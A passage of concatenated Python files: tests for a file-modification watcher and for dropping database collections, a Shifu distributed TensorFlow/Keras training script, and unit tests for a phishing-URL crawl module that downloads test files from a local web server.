tmpdir.mkdir('data')
for fname in files:
tmpdir.join(fname).open('a').close()
os.chdir(tmpdir.strpath)
fw = FileModifyWatcher((files[0], files[1], dir1))
# file_list contains absolute paths
assert 2 == len(fw.file_list)
assert os.path.abspath(files[0]) in fw.file_list
assert os.path.abspath(files[1]) in fw.file_list
# watch_dirs
assert 2 == len(fw.watch_dirs)
assert tmpdir.join('data') in fw.watch_dirs
assert tmpdir.join('data3') in fw.watch_dirs
# notify_dirs
assert 1 == len(fw.notify_dirs)
assert tmpdir.join('data3') in fw.notify_dirs
def testUnsuportedPlatform(self, monkeypatch):
monkeypatch.setattr(FileModifyWatcher, 'supported_platforms', ())
pytest.raises(Exception, FileModifyWatcher, [])
def testHandleEventNotSubclassed(self):
fw = FileModifyWatcher([])
pytest.raises(NotImplementedError, fw.handle_event, None)
def testLoop(self, restore_cwd, tmpdir):
files = ['data/w1.txt', 'data/w2.txt', 'data/w3.txt']
stop_file = 'data/stop'
tmpdir.mkdir('data')
for fname in files + [stop_file]:
tmpdir.join(fname).open('a').close()
os.chdir(tmpdir.strpath)
fw = FileModifyWatcher((files[0], files[1], stop_file))
events = []
should_stop = []
started = []
def handle_event(event):
events.append(event.pathname)
if event.pathname.endswith("stop"):
should_stop.append(True)
fw.handle_event = handle_event
def loop_callback(notifier):
started.append(True)
# force loop to stop
if should_stop:
raise KeyboardInterrupt
loop_thread = threading.Thread(target=fw.loop, args=(loop_callback,))
loop_thread.daemon = True
loop_thread.start()
# wait watcher to be ready
while not started: # pragma: no cover
time.sleep(0.01)
assert loop_thread.isAlive()
# write in watched file
fd = open(files[0], 'w')
fd.write("hi")
fd.close()
# write in non-watched file
fd = open(files[2], 'w')
fd.write("hi")
fd.close()
# write in another watched file
fd = open(files[1], 'w')
fd.write("hi")
fd.close()
# tricky to stop watching
fd = open(stop_file, 'w')
fd.write("hi")
fd.close()
time.sleep(0.1)
loop_thread.join(1)
if loop_thread.isAlive(): # pragma: no cover
# this test is very flaky so we give it one more chance...
# write on file to terminate thread
fd = open(stop_file, 'w')
fd.write("hi")
fd.close()
loop_thread.join(1)
if loop_thread.is_alive(): # pragma: no cover
raise Exception("thread not terminated")
assert os.path.abspath(files[0]) == events[0]
assert os.path.abspath(files[1]) == events[1]
|
test_drop_collection.py
|
import pdb
import pytest
import logging
import itertools
from time import sleep
import threading
from multiprocessing import Process
from utils import *
from constants import *
uid = "drop_collection"
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_collection_A(self, connect, collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
def test_drop_collection_without_connection(self, collection, dis_connect):
'''
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_collection_not_existed(self, connect):
'''
target: test if collection not created
method: random a collection name, which not existed in db,
assert the exception raised returned by drp_collection method
expected: False
'''
collection_name = gen_unique_str(uid)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_drop_collection_multithread(self, connect):
'''
target: test create and drop collection with multithread
method: create and drop collection using multithread,
expected: collections are created, and dropped
'''
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid)
collection_names.append(collection_name)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
|
distributed_tf_keras_to_estimator.py
|
"""Synchronous SGD
"""
# from __future__ import print_function
import os
import tensorflow as tf
import argparse
import time
import sys
import logging
import gzip
from StringIO import StringIO
import random
import numpy as np
from tensorflow.python.platform import gfile
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import builder
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow import keras
import json
import socket
import shutil
from tensorflow.python.client import timeline
import datetime
import math
#from threading import Thread
#import tensorboard.main as tb_main
TRAINING_MODE = "Training"
EVAL_MODE = "Validation"
HIDDEN_NODES_COUNT = 20
VALID_TRAINING_DATA_RATIO = 0.1
BUILD_MODEL_BY_CONF_ENABLE = True
REPLICAS_TO_AGGREGATE_RATIO = 1
DELIMITER = '|'
BATCH_SIZE = 128
# read from env
cluster_spec = json.loads(os.environ["CLUSTER_SPEC"])
n_pss = len(cluster_spec['ps']) # the number of parameter servers
n_workers = int(os.environ["WORKER_CNT"]) # the number of worker nodes
job_name = os.environ["JOB_NAME"]
task_index = int(os.environ["TASK_ID"])
socket_server_port = int(os.environ["SOCKET_SERVER_PORT"]) # The port of local java socket server listening, to sync worker training intermediate information with master
total_training_data_number = 40578 #int(os.environ["TOTAL_TRAINING_DATA_NUMBER"]) # total data
feature_column_nums = [int(s) for s in str(os.environ["SELECTED_COLUMN_NUMS"]).split(' ')] # selected column numbers
FEATURE_COUNT = len(feature_column_nums)
sample_weight_column_num = int(os.environ["WEIGHT_COLUMN_NUM"]) # weight column number, default is -1
target_column_num = int(os.environ["TARGET_COLUMN_NUM"]) # target column number, default is -1
tmp_model_path = os.environ["TMP_MODEL_PATH"]
final_model_path = os.environ["FINAL_MODEL_PATH"]
# This client is used for sync worker training intermediate information with master
socket_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_client.connect(("127.0.0.1", socket_server_port))
#######################################################################################################################
#### Start of Define TF Graph: User can change below graph but make sure tf.train.SyncReplicasOptimizer not changed
#######################################################################################################################
def model(x, y_, sample_weight, model_conf):
logging.info("worker_num:%d" % n_workers)
logging.info("total_training_data_number:%d" % total_training_data_number)
if BUILD_MODEL_BY_CONF_ENABLE and model_conf is not None:
output_digits, output_nodes = generate_from_modelconf(x, model_conf)
else:
output_digits = nn_layer(x, FEATURE_COUNT, HIDDEN_NODES_COUNT, act_op_name="hidden_layer_1")
output_nodes = HIDDEN_NODES_COUNT
logging.info("output_nodes : " + str(output_nodes))
y = nn_layer(output_digits, output_nodes, 1, act=tf.nn.sigmoid, act_op_name="shifu_output_0")
# count the number of updates
global_step = tf.get_variable('global_step', [],
initializer=tf.constant_initializer(0),
trainable=False,
dtype=tf.int32)
loss = tf.losses.mean_squared_error(predictions=y, labels=y_, weights=sample_weight)
# we suppose every worker has same batch_size
if model_conf is not None:
learning_rate = model_conf['train']['params']['LearningRate']
else:
learning_rate = 0.003
opt = tf.train.SyncReplicasOptimizer(
#tf.train.GradientDescentOptimizer(learning_rate),
#tf.train.AdamOptimizer(learning_rate=learning_rate),
get_optimizer(model_conf['train']['params']['Propagation'])(learning_rate=learning_rate),
replicas_to_aggregate=int(total_training_data_number * (1-VALID_TRAINING_DATA_RATIO) / BATCH_SIZE * REPLICAS_TO_AGGREGATE_RATIO),
total_num_replicas=int(total_training_data_number * (1-VALID_TRAINING_DATA_RATIO) / BATCH_SIZE),
name="shifu_sync_replicas")
train_step = opt.minimize(loss, global_step=global_step)
return opt, train_step, loss, global_step, y
#######################################################################################################################
#### END of Define TF Graph
#######################################################################################################################
def nn_layer(input_tensor, input_dim, output_dim, l2_scale=0.01, act=tf.nn.tanh, act_op_name=None):
l2_reg = tf.contrib.layers.l2_regularizer(scale=l2_scale)
weights = tf.get_variable(name="weight_"+str(act_op_name),
shape=[input_dim, output_dim],
regularizer=l2_reg,
#initializer=tf.glorot_uniform_initializer())
initializer=tf.contrib.layers.xavier_initializer())
biases = tf.get_variable(name="biases_"+str(act_op_name),
shape=[output_dim],
regularizer=l2_reg,
#initializer=tf.glorot_uniform_initializer())
initializer=tf.contrib.layers.xavier_initializer())
activations = act(tf.matmul(input_tensor, weights) + biases, name=act_op_name)
return activations
def get_activation_fun(name):
if name is None:
return tf.nn.leaky_relu
name = name.lower()
if 'sigmoid' == name:
return tf.nn.sigmoid
elif 'tanh' == name:
return tf.nn.tanh
elif 'relu' == name:
return tf.nn.relu
elif 'leakyrelu' == name:
return tf.nn.leaky_relu
else:
return tf.nn.leaky_relu
def get_optimizer(name):
if 'Adam' == name:
return tf.train.AdamOptimizer
elif 'B' == name:
return tf.train.GradientDescentOptimizer
elif 'AdaGrad' == name:
return tf.train.AdagradOptimizer
else:
return tf.train.AdamOptimizer
def generate_from_modelconf(x, model_conf):
train_params = model_conf['train']['params']
num_hidden_layer = int(train_params['NumHiddenLayers'])
num_hidden_nodes = [int(s) for s in train_params['NumHiddenNodes']]
activation_func = [get_activation_fun(s) for s in train_params['ActivationFunc']]
if "RegularizedConstant" in train_params:
l2_scale = train_params["RegularizedConstant"]
else:
l2_scale = 0.01
global FEATURE_COUNT
logging.info("NN information: feature count: %s, hiddern layer: %s, hidden nodes: %s" % (FEATURE_COUNT, num_hidden_layer, str(num_hidden_nodes)))
# first layer
previous_layer = nn_layer(x, FEATURE_COUNT, num_hidden_nodes[0], l2_scale=l2_scale,
act=activation_func[0], act_op_name="hidden_layer_" + str(0))
for i in range(1, num_hidden_layer):
layer = nn_layer(previous_layer, num_hidden_nodes[i-1], num_hidden_nodes[i], l2_scale=l2_scale,
act=activation_func[i], act_op_name="hidden_layer_" + str(i))
previous_layer = layer
return previous_layer, num_hidden_nodes[num_hidden_layer-1]
def get_initalizer(name):
if 'gaussian' == name:
return tf.initializers.random_normal()
elif 'xavier' == name:
return tf.contrib.layers.xavier_initializer()
else:
return tf.contrib.layers.xavier_initializer()
def get_loss_func(name):
if name == None:
return tf.losses.mean_squared_error
name = name.lower()
if 'squared' == name:
return tf.losses.mean_squared_error
elif 'absolute' == name:
return tf.losses.absolute_difference
elif 'log' == name:
return tf.losses.log_loss
else:
return tf.losses.mean_squared_error
def dnn_model_fn(features, labels, mode, params):
logging.error("features:" + str(features))
shifu_context = params['shifu_context']
layers = shifu_context["layers"]
global FEATURE_COUNT
FEATURE_COUNT = shifu_context["feature_count"]
learning_rate = shifu_context["learning_rate"]
loss_func = shifu_context["loss_func"]
optimizer_name = shifu_context["optimizer"]
weight_initalizer = shifu_context["weight_initalizer"]
act_funcs = shifu_context["act_funcs"]
new_model = get_model(optimizer_name, learning_rate)
input_layer = tf.convert_to_tensor(features['input_feature'], dtype=tf.float32, name=new_model.input.name)
#input_layer = features['input_feature']
sample_weight = tf.convert_to_tensor(features['sample_weight'], dtype=tf.float32, name='shifu_input_wgt_0')
# Start define model structure
#model = [input_layer]
#current_layer = input_layer
#for i in range(len(layers)):
# node_num = layers[i]
# current_layer = tf.layers.dense(inputs=current_layer, units=node_num,
# activation=get_activation_fun(act_funcs[i]),
# kernel_initializer=get_initalizer(weight_initalizer),
# kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=0.1)
# )
# model.append(current_layer)
#logits = tf.layers.dense(inputs=current_layer, units=1,
# kernel_initializer=get_initalizer(weight_initalizer),
# kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=0.1)
# )
#prediction = tf.nn.sigmoid(logits, name="shifu_output_0")
prediction = new_model.output
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'scores': prediction
}
export_outputs = {
'predictions': tf.estimator.export.PredictOutput(predictions)
}
# In `PREDICT` mode we only need to return predictions.
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions, export_outputs=export_outputs)
average_loss = get_loss_func(new_model.loss)(predictions=new_model.output, labels=labels, weights=features['sample_weight'])
# Pre-made estimators use the total_loss instead of the average,
# so report total_loss for compatibility.
# batch_size = tf.shape(labels)[0]
# total_loss = tf.to_float(batch_size) * average_loss
if mode == tf.estimator.ModeKeys.TRAIN:
opt = tf.train.SyncReplicasOptimizer(
#tf.train.GradientDescentOptimizer(learning_rate),
#tf.train.AdamOptimizer(learning_rate=learning_rate),
new_model.optimizer.optimizer,
replicas_to_aggregate=int(total_training_data_number * (1-VALID_TRAINING_DATA_RATIO) / BATCH_SIZE * REPLICAS_TO_AGGREGATE_RATIO),
total_num_replicas=int(total_training_data_number * (1-VALID_TRAINING_DATA_RATIO) / BATCH_SIZE),
name="shifu_sync_replicas")
train_op = opt.minimize(average_loss, global_step=tf.train.get_global_step())
# init ops
init_tokens_op = opt.get_init_tokens_op()
# initialize local step
local_init = opt.local_step_init_op
sync_replicas_hook = opt.make_session_run_hook(shifu_context["is_chief"])
if shifu_context["is_chief"]:
# initializes token queue
local_init = opt.chief_init_op
# checks if global vars are init
ready_for_local_init = opt.ready_for_local_init_op
# Initializing the variables
init_op = tf.initialize_all_variables()
logging.info("---Variables initialized---")
stop_hook = tf.train.StopAtStepHook(num_steps=shifu_context['epoch'])
chief_hooks = [sync_replicas_hook, stop_hook]
return tf.estimator.EstimatorSpec(mode=mode, loss=average_loss, train_op=train_op, training_chief_hooks=chief_hooks, training_hooks=[sync_replicas_hook])
eval_metrics = {"a-loss": tf.metrics.mean_squared_error(predictions=prediction, labels=labels,
weights=features['sample_weight'])}
if mode == tf.estimator.ModeKeys.EVAL:
return tf.estimator.EstimatorSpec(
mode=mode,
# Report sum of error for compatibility with pre-made estimators
loss=average_loss,
eval_metric_ops=eval_metrics)
class TrainAndEvalErrorHook(tf.train.SessionRunHook):
_current_epoch = 1
def __init__(self, mode_name=None, data_cnt=0, batch_size=1):
self._mode_name = mode_name
self._data_cnt = float(data_cnt)
# TODO such steps should be recompute
self.steps_per_epoch = math.ceil(data_cnt / batch_size)
self.total_loss = 0.0
self.current_step = 1
logging.info("")
logging.info("*** " + self._mode_name + " Hook: - Created")
logging.info("steps_per_epoch: " + str(self.steps_per_epoch))
logging.info("")
def begin(self):
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError("Global step should be created to use StopAtStepHook.")
def before_run(self, run_context):
graph = run_context.session.graph
# tensor_name = 'loss_tensor_0'
# loss_tensor = graph.get_tensor_by_name(tensor_name)
loss_tensor = graph.get_collection(tf.GraphKeys.LOSSES)[0]
return tf.train.SessionRunArgs(loss_tensor, self._global_step_tensor)
def after_run(self, run_context, run_values):
logging.info("Eval: " + str(run_values));
current_loss = run_values.results[0]
self.total_loss += current_loss
global_step = run_values.results[1] + 1
if EVAL_MODE == self._mode_name:
logging.info("Eval: " +self._mode_name + " Epoch " + str(
global_step - 1) + ": Loss :" + str(self.total_loss))
elif TRAINING_MODE == self._mode_name:
logging.info("Training" + self._mode_name + " Epoch " + str(global_step-1) + ": Loss :" + str(
self.total_loss))
else:
logging.info("Invalid mode name: " + self._mode_name)
# Send intermediate result to master
message = "worker_index:{},time:{},current_epoch:{},training_loss:{},valid_loss:{},valid_time:{}\n".format(
str(task_index), "1", str(global_step), str(self.total_loss), "0", "1")
if sys.version_info < (3, 0):
socket_client.send(bytes(message))
else:
socket_client.send(bytes(message), 'utf8')
self.total_loss = 0.0
if "Training" == self._mode_name:
type(self)._current_epoch += 1
self.current_step += 1
def move_model(export_dir):
if os.path.isfile(export_dir + '/saved_model.pb'):
os.remove(export_dir + '/saved_model.pb')
shutil.rmtree(export_dir + "/variables/", ignore_errors=True)
dirs = [export_dir + "/" + d for d in os.listdir(export_dir) if os.path.isdir(export_dir + "/" + d)]
latest = sorted(dirs, key=lambda x: os.path.getctime(x), reverse=True)[0]
for f in os.listdir(latest):
cur = latest + '/' + f
if os.path.isdir(cur):
shutil.copytree(cur, export_dir + '/' + f)
else:
shutil.copy(cur, export_dir + '/' + f)
def get_model(opti_name, learning_rate):
inputs = keras.Input(shape=(FEATURE_COUNT,), name='shifu_input_0') # Returns a placeholder tensor
# A layer instance is callable on a tensor, and returns a tensor.
x = keras.layers.Dense(40, activation='relu', name='hidden_layer_1')(inputs)
predictions = keras.layers.Dense(1, activation='sigmoid', name='shifu_output_0')(x)
model = tf.keras.models.Model(inputs, predictions)
#model.compile(loss='binary_crossentropy', optimizer=get_optimizer(opti_name)(learning_rate=learning_rate), metrics=['mse'])
#model.compile(loss='binary_crossentropy', optimizer=get_optimizer(opti_name)(learning_rate=learning_rate), metrics=['mse'])
model.compile(loss='binary_crossentropy', optimizer=tf.keras.optimizers.Adam(lr=learning_rate), metrics=['mse'])
return model
def main(_):
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s', datefmt='%y-%m-%d %H:%M:%S')
logging.info("job_name:%s, task_index:%d" % (job_name, task_index))
ps_hosts = cluster_spec['ps']
worker_hosts = cluster_spec['worker']
myaddr = socket.gethostbyname(socket.getfqdn(socket.gethostname()))
logging.info("myaddr = %s" % myaddr)
chief = worker_hosts[0]
new_workers = worker_hosts[1:len(worker_hosts)]
cluster = {'chief': [chief],
'ps': ps_hosts,
'worker': worker_hosts}
new_job_name = 'chief' if (task_index == 0 and job_name == 'worker') else job_name
cluster_task_index = task_index
if job_name == 'worker' and task_index != 0: # checks if parameter server
cluster_task_index -= 1;
os.environ['TF_CONFIG'] = json.dumps(
{'cluster': cluster,
'task': {'type': new_job_name, 'index': task_index}})
logging.info("TF_CONFIG = %s" % os.environ['TF_CONFIG'])
if job_name == 'ps': # checks if parameter server
server = tf.train.Server(cluster,
job_name="ps",
task_index=task_index)
server.join()
else: # it must be a worker server
is_chief = (task_index == 0) # checks if this is the chief node
logging.info("Loading data from worker index = %d" % task_index)
TIME_INTERVAL_TO_DO_VALIDATION = 3 # seconds
logging.info("Loading data from worker index = %d" % task_index)
training_data_path = os.environ["TRAINING_DATA_PATH"]
if "TRAINING_DATA_PATH" in os.environ:
logging.info("This is a normal worker..")
else:
logging.info("This is a backup worker")
# watching certain file in hdfs which contains its training data
# Read model structure info from ModelConfig
with open('./ModelConfig.json') as f:
model_conf = json.load(f)
logging.info("model" + str(model_conf))
EPOCH = int(model_conf['train']['numTrainEpochs'])
global VALID_TRAINING_DATA_RATIO
VALID_TRAINING_DATA_RATIO = model_conf['train']['validSetRate']
is_continue_train = model_conf['train']['isContinuous']
global BATCH_SIZE
if "MiniBatchs" in model_conf['train']['params']:
BATCH_SIZE = model_conf['train']['params']['MiniBatchs']
logging.info("Batch size: " + str(BATCH_SIZE) + ", VALID_TRAINING_DATA_RATIO: " + str(VALID_TRAINING_DATA_RATIO))
# import data
context = load_data(training_data_path)
if model_conf is not None:
learning_rate = model_conf['train']['params']['LearningRate']
else:
learning_rate = 0.003
shifu_context = {
"feature_column_nums": feature_column_nums, "layers": model_conf['train']['params']['NumHiddenNodes'], "batch_size": BATCH_SIZE, "feature_count": FEATURE_COUNT, "model_name": model_conf['basic']['name'], "is_chief": is_chief,
"export_dir": final_model_path, "epoch": EPOCH, "sample_weight_column_num": sample_weight_column_num,
"learning_rate": learning_rate, "loss_func": model_conf['train']['params']['Loss'], "optimizer": "adam",
"weight_initalizer": "xavier", "act_funcs": model_conf['train']['params']['ActivationFunc']}
# Train the model TODO epcoch and step in below
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={'input_feature': np.asarray(context['train_data'], dtype=np.float32),
'sample_weight': np.asarray(context["train_data_sample_weight"], dtype=np.float32)},
y=np.asarray(context["train_target"], dtype=np.float32),
batch_size=shifu_context["batch_size"],
num_epochs=shifu_context['epoch'],
shuffle=False)
train_spec = tf.estimator.TrainSpec(input_fn=train_input_fn,
max_steps=EPOCH,
hooks=[])
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={'input_feature': np.asarray(context['valid_data'], dtype=np.float32),
'sample_weight': np.asarray(context["valid_data_sample_weight"], dtype=np.float32)},
y=np.asarray(context["valid_target"], dtype=np.float32),
batch_size=len(context["valid_target"]),
num_epochs=shifu_context['epoch'],
shuffle=False)
eval_spec = tf.estimator.EvalSpec(input_fn=eval_input_fn,
throttle_secs=TIME_INTERVAL_TO_DO_VALIDATION,
hooks=[TrainAndEvalErrorHook(EVAL_MODE, len(context["valid_target"]), len(context["valid_target"]))])
run_config = tf.estimator.RunConfig(tf_random_seed=19830610,
model_dir=tmp_model_path,
save_checkpoints_steps=10,
log_step_count_steps=1)
#train_distribute=tf.contrib.distribute.ParameterServerStrategy)
#dnn = tf.estimator.Estimator(model_fn=dnn_model_fn, params={'shifu_context': shifu_context}, config=run_config)
new_model = get_model(model_conf, learning_rate)
keras.backend.set_learning_phase(1)
keras.backend.manual_variable_initialization(True)
#shifu_context['keras_model'] = new_model
#dnn = tf.estimator.Estimator(model_fn=dnn_model_fn, params={'shifu_context': shifu_context}, config=run_config)
logging.info("Model inputs: " + str(new_model.inputs) + "; Model outputs: " + str(new_model.output) + "; Loss: " + str(new_model.loss) + "; optimizer: " + str(new_model.optimizer))
init_op = tf.initialize_all_variables()
#with tf.Session() as sess:
# sess.run(tf.global_variables_initializer())
dnn = tf.keras.estimator.model_to_estimator(keras_model=new_model, config=run_config)
tf.estimator.train_and_evaluate(dnn, train_spec, eval_spec)
#tf.estimator.train_and_evaluate(dnn, train_spec, eval_spec)
if shifu_context['is_chief']:
export_dir = shifu_context["export_dir"]
dnn.export_savedmodel(export_dir, serving_input_receiver_fn)
export_generic_config(export_dir=export_dir)
def load_data(data_file):
data_file_list = data_file.split(",")
global feature_column_nums
logging.info("input data %s" % data_file_list)
logging.info("SELECTED_COLUMN_NUMS" + str(feature_column_nums))
train_data = []
train_target = []
valid_data = []
valid_target = []
training_data_sample_weight = []
valid_data_sample_weight = []
train_pos_cnt = 0
train_neg_cnt = 0
valid_pos_cnt = 0
valid_neg_cnt = 0
file_count = 1
line_count = 0
for currentFile in data_file_list:
logging.info(
"Now loading " + currentFile + " Progress: " + str(file_count) + "/" + str(len(data_file_list)) + ".")
file_count += 1
with gfile.Open(currentFile, 'rb') as f:
gf = gzip.GzipFile(fileobj=StringIO(f.read()))
while True:
line = gf.readline()
if len(line) == 0:
break
line_count += 1
if line_count % 10000 == 0:
logging.info("Total loading lines: " + str(line_count))
columns = line.split(DELIMITER)
if feature_column_nums is None:
feature_column_nums = range(0, len(columns))
feature_column_nums.remove(target_column_num)
if sample_weight_column_num >= 0:
feature_column_nums.remove(sample_weight_column_num)
if random.random() >= VALID_TRAINING_DATA_RATIO:
# Append training data
train_target.append([float(columns[target_column_num])])
if columns[target_column_num] == "1":
train_pos_cnt += 1
else:
train_neg_cnt += 1
single_train_data = []
for feature_column_num in feature_column_nums:
try:
single_train_data.append(float(columns[feature_column_num].strip('\n')))
except:
logging.info("Could not convert " + str(columns[feature_column_num].strip('\n') + " to float"))
logging.info("feature_column_num: " + str(feature_column_num))
train_data.append(single_train_data)
if sample_weight_column_num >= 0 and sample_weight_column_num < len(columns):
weight = float(columns[sample_weight_column_num].strip('\n'))
if weight < 0.0:
logging.info("Warning: weight is below 0. example:" + line)
weight = 1.0
training_data_sample_weight.append([weight])
else:
training_data_sample_weight.append([1.0])
else:
# Append validation data
valid_target.append([float(columns[target_column_num])])
if columns[target_column_num] == "1":
valid_pos_cnt += 1
else:
valid_neg_cnt += 1
single_valid_data = []
for feature_column_num in feature_column_nums:
try:
single_valid_data.append(float(columns[feature_column_num].strip('\n')))
except:
logging.info("Could not convert " + str(columns[feature_column_num].strip('\n') + " to float"))
logging.info("feature_column_num: " + str(feature_column_num))
valid_data.append(single_valid_data)
if sample_weight_column_num >= 0 and sample_weight_column_num < len(columns):
weight = float(columns[sample_weight_column_num].strip('\n'))
if weight < 0.0:
logging.info("Warning: weight is below 0. example:" + line)
weight = 1.0
valid_data_sample_weight.append([weight])
else:
valid_data_sample_weight.append([1.0])
logging.info("Total data count: " + str(line_count) + ".")
logging.info("Train pos count: " + str(train_pos_cnt) + ", neg count: " + str(train_neg_cnt) + ".")
logging.info("Valid pos count: " + str(valid_pos_cnt) + ", neg count: " + str(valid_neg_cnt) + ".")
return {"train_data": train_data, "train_target": train_target,
"valid_data": valid_data, "valid_target": valid_target,
"train_data_sample_weight": training_data_sample_weight,
"valid_data_sample_weight": valid_data_sample_weight,
"feature_count": len(feature_column_nums)}
def simple_save(session, export_dir, inputs, outputs, legacy_init_op=None):
if tf.gfile.Exists(export_dir):
tf.gfile.DeleteRecursively(export_dir)
signature_def_map = {
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
signature_def_utils.predict_signature_def(inputs, outputs)
}
b = builder.SavedModelBuilder(export_dir)
b.add_meta_graph_and_variables(
session,
tags=[tag_constants.SERVING],
signature_def_map=signature_def_map,
assets_collection=ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS),
legacy_init_op=legacy_init_op,
clear_devices=True)
b.save()
export_generic_config(export_dir=export_dir)
def serving_input_receiver_fn():
global FEATURE_COUNT
inputs = {
'input_feature': tf.placeholder(tf.float32, [None, FEATURE_COUNT], name='shifu_input_0'),
'sample_weight': tf.placeholder(tf.float32, [None, 1], name='shifu_input_wgt_0')
}
return tf.estimator.export.ServingInputReceiver(inputs, inputs)
def export_generic_config(export_dir):
config_json_str = ""
config_json_str += "{\n"
config_json_str += " \"inputnames\": [\n"
config_json_str += " \"shifu_input_0\"\n"
config_json_str += " ],\n"
config_json_str += " \"properties\": {\n"
config_json_str += " \"algorithm\": \"tensorflow\",\n"
config_json_str += " \"tags\": [\"serve\"],\n"
config_json_str += " \"outputnames\": \"shifu_output_0\",\n"
config_json_str += " \"normtype\": \"ZSCALE\"\n"
config_json_str += " }\n"
config_json_str += "}"
f = tf.gfile.GFile(export_dir + "/GenericModelConfig.json", mode="w+")
f.write(config_json_str)
def start_tensorboard(checkpoint_dir):
tf.flags.FLAGS.logdir = checkpoint_dir
if TB_PORT_ENV_VAR in os.environ:
tf.flags.FLAGS.port = os.environ['TB_PORT']
tb_thread = Thread(target=tb_main.run_main)
tb_thread.daemon = True
logging.info("Starting TensorBoard with --logdir=" + checkpoint_dir + " in daemon thread...")
tb_thread.start()
if __name__ == '__main__':
tf.app.run()
|
test_url.py
|
# vim: sw=4:ts=4:et
import datetime
import http.server
import logging
import socketserver
import threading
import unittest
import saq, saq.test
from saq.constants import *
from saq.test import *
LOCAL_PORT = 43124
web_server = None
class TestCase(ACEModuleTestCase):
@classmethod
def setUpClass(cls):
global web_server
# create a simple web server listening on localhost
class _customTCPServer(socketserver.TCPServer):
allow_reuse_address = True
web_server = _customTCPServer(('', LOCAL_PORT), http.server.SimpleHTTPRequestHandler)
web_server_thread = threading.Thread(target=web_server.serve_forever)
web_server_thread.daemon = True
web_server_thread.start()
@classmethod
def tearDownClass(cls):
web_server.shutdown()
def setUp(self):
ACEModuleTestCase.setUp(self)
# disable proxy for crawlphish
self.old_proxies = saq.PROXIES
saq.PROXIES = {}
def tearDown(self):
ACEModuleTestCase.tearDown(self)
saq.PROXIES = self.old_proxies
def test_basic_download(self):
from saq.modules.url import CrawlphishAnalysisV2
root = create_root_analysis()
root.initialize_storage()
url = root.add_observable(F_URL, 'http://localhost:{}/test_data/crawlphish.000'.format(LOCAL_PORT))
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_crawlphish', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
analysis = url.get_analysis(CrawlphishAnalysisV2)
self.assertEquals(analysis.status_code, 200)
self.assertEquals(analysis.file_name, 'crawlphish.000')
self.assertTrue(analysis.downloaded)
self.assertIsNone(analysis.error_reason)
# there should be a single F_FILE observable
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 1)
file_observable = file_observables[0]
self.assertTrue(file_observable.has_directive(DIRECTIVE_EXTRACT_URLS))
self.assertTrue(file_observable.has_relationship(R_DOWNLOADED_FROM))
def test_download_404(self):
"""We should not extract URLs from data downloaded from URLs that returned a 404."""
from saq.modules.url import CrawlphishAnalysisV2
root = create_root_analysis()
root.initialize_storage()
url = root.add_observable(F_URL, 'http://localhost:{}/test_data/crawlphish.001'.format(LOCAL_PORT))
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_crawlphish', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
analysis = url.get_analysis(CrawlphishAnalysisV2)
self.assertEquals(analysis.proxy_results['GLOBAL'].status_code, 404)
if 'tor' in analysis.proxy_results:
self.assertIsNone(analysis.proxy_results['tor'].status_code)
self.assertIsNone(analysis.file_name) # no file should have been downloaded
self.assertFalse(analysis.downloaded)
self.assertIsNotNone(analysis.error_reason)
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 0)
@unittest.skip
@force_alerts
def test_live_browser_basic(self):
"""Basic test of LiveBrowserAnalysis."""
from saq.modules.url import CrawlphishAnalysisV2
from saq.modules.url import LiveBrowserAnalysis
root = create_root_analysis()
root.initialize_storage()
url = root.add_observable(F_URL, 'http://localhost:{}/test_data/live_browser.000.html'.format(LOCAL_PORT))
